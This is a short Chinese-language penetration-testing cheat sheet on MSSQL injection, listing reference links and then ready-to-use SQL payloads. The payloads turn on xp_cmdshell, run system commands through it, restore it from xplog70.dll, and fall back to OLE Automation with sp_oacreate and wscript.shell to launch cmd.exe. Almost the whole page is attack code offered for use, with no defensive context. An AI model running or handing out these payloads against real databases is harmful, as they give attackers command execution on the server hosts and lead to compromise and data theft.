WebBook

MSSQL注入

参考：

• https://xz.aliyun.com/t/248
• https://xz.aliyun.com/t/1224
• https://xz.aliyun.com/t/1051
• https://xz.aliyun.com/t/2596

命令执行

开启xp_cmdshell并调用执行命令

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;  /*开启xp_cmdshell*/

exec master..xp_cmdshell "whoami"  /*执行命令*/

Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll' /*使用xplog70.dll恢复xp_cmdshell*/

xp_cmdshell被删除，使用SP_OACreate

EXEC sp_configure 'show advanced options', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'Ole Automation Procedures', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'show advanced options', 0;

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >d:\\1.txt'   //